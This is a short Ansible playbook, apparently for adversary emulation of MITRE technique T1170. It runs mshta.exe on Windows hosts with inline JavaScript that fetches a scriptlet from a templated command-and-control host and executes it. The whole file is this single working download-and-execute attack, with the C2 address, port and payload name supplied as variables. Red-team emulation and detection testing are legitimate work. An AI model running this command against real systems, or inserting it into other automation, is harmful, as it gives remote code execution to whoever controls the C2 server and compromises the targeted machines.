#T1170 - Mshta

- name: MSHTA - Windows
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: download and execute
      win_command: |
        "mshta.exe javascript:a=GetObject('script:http://{{ cnc_fqdn }}:{{ cnc_port}}/{{ cnc_sct }}').Exec();close();"
      
